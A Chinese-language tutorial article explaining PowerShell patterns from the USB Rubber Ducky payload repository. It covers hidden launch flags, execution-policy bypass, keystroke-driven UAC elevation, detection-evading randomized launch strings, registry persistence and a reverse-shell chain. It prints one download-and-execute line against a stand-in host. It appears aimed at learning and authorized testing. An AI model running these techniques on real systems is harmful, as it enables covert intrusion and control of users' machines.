ARTICLE DETAIL

资讯详情

深耕网站建设与运营推广的一线实战洞察。

USB Rubber Ducky仓库中PowerShell常用技巧清单:系统命令调用模式

USB Rubber Ducky仓库中PowerShell常用技巧清单:系统命令调用模式 USB Rubber Ducky仓库中PowerShell常用技巧清单系统命令调用模式【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloadsUSB Rubber Ducky 是一款伪装成 U 盘的键盘注入设备而这个官方 Payload 仓库中最核心的技巧就是教会它敲出一行 PowerShell 命令。本文将带你快速看懂仓库中8 种常见的 PowerShell 系统命令调用模式配合现成的扩展模块Extensions新手也能在 10 分钟内读懂并复用这些 Payload。一、核心原理DuckyScript 如何驱动PowerShellUSB Rubber Ducky 的本质是一个超高速自动键盘。它不上传文件、不跑驱动只做一件事模拟人类按键。所以在 Windows 平台上几乎所有高价值 Payload 的套路都是一套固定组合拳等待系统就绪DELAY按下Win R打开运行框DuckyScript 中写作GUI r敲入powershell加一组参数回车继续敲入 PowerShell 单行命令执行目标动作理解了这条主线下面所有技巧都是它的变体。二、8 种最常用的 PowerShell 调用模式清单1️⃣ 静默启动-NoP -NonI -w h仓库中最经典的启动姿势三个参数的含义参数作用-NoProfile跳过加载用户配置文件加快启动-NonInteractive非交互模式防止卡在提示符-WindowStyle hidden窗口完全隐藏用户看不到黑框在 ReverseDucky 反向 Shell 载荷 中这一模式与GUI r组合后PowerShell 会在后台隐形启动。2️⃣ 绕过执行策略-ep Bypass企业内网常设置脚本执行限制ExecutionPolicyPayload 会直接在启动参数里加-ep Bypass或-exec bypass让脚本当场生效而不改系统策略。上图来自 Starting_a_PowerShell_with_administrator_permissions_in_Windows 的实测截图策略从Restricted变为Bypass脚本即可直接运行。3️⃣ 一键下载执行IEX DownloadString这是单行远程执行的黄金公式——下载远程脚本并立即执行全程不落盘iex (New-Object Net.WebClient).DownloadString(https://example.com/script.ps1)credentials/Hasta lasagna! 就是典型用法先静默启动 PowerShell再敲入这行魔法命令。4️⃣ 文件下载四兄弟Invoke-WebRequest等如果只需要下载文件而不执行仓库提供了 POWERSHELL_DOWNLOAD 扩展内置 4 种下载函数Invoke-WebRequestPowerShell 原生Invoke-RestMethod轻量版Start-BitsTransfer走 Windows BITS 服务更低调curl.exe系统自带行为最正常通过DEFINE变量配置 URL 和输出文件名即可复用。5️⃣ UAC 提权CTRL-SHIFT ENTER想要管理员权限仓库的 WINDOWS_ELEVATED_EXECUTION 扩展封装了运行框提权技巧输入powershell后按CtrlShiftEnter弹出 UAC再自动按Alty英文布局点下是。对德、西文布局也做了适配。6️⃣ 随机化启动ROLLING_POWERSHELL_EXECUTION这是仓库里最有意思的扩展。ROLLING_POWERSHELL_EXECUTION 内置16 种 PowerShell 启动变体大小写混淆、参数缩写、借助环境变量拼字符等每次注入随机选一种让命令字符串每次都不一样从而避开基于固定字符串的简易检测。7️⃣ 注册表持久化New-ItemSet-ItemProperty不少执行类Payload 会写注册表如HKCU:\Software\Classes\ms-settings\Shell\Open\command实现自启动DuckyHelper 展示了完整的写注册表 → 触发自启动 → 清理痕迹三段式写法。8️⃣ Win11 控制台降级让-w h重新可用Windows 11 默认的新终端不支持-WindowStyle Hidden。WINDOWS11_CONSOLE_DOWNGRADE 扩展通过写注册表把控制台切回旧版 Conhost静默模式即可恢复。三、实战案例反向 Shell 是如何串起来的把上面几招组合起来就是一个完整的 ReverseDuckyGUI r→ 打开运行框powershell -NoP -NonI -w h→ 静默启动一段字符串拼接的 TCP 长连接脚本 → 建立交互式反向 Shell攻击端监听成功后的效果如下来自 ReverseDuckyUltimate 的实测截图提示符DuckyPS C:\WINDOWS\system32表明 PowerShell 会话已完全接管四、新手学习路线建议 阶段建议第 1 步先读仓库根目录 README.md理解 DuckyScript 3.0 与 PayloadStudio 编译流程第 2 步通读 payloads/examples/ 下的条件、循环、函数示例掌握语法基础第 3 步对照本文清单逐一走读 payloads/extensions/ 中 4 个 PowerShell 扩展第 4 步在自己拥有的虚拟机中测试观察每种参数组合的实际效果五、安全与合规提醒 ⚠️仓库 README 已明确声明所有 Payload仅供教育、授权渗透测试与安全研究使用。❌ 严禁在未获书面授权的系统上运行任何 Payload✅ 请先在隔离虚拟机中练习熟悉每种命令模式的实际行为✅ 提交新 Payload 前请阅读 CONTRIBUTING.md 的命名规范与配置要求掌握这套系统命令调用模式后你再去读仓库里几百个 Payload会发现它们不过是这 8 种模式的排列组合而已。【免费下载链接】usbrubberducky-payloadsThe Official USB Rubber Ducky Payload Repository项目地址: https://gitcode.com/GitHub_Trending/us/usbrubberducky-payloads创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表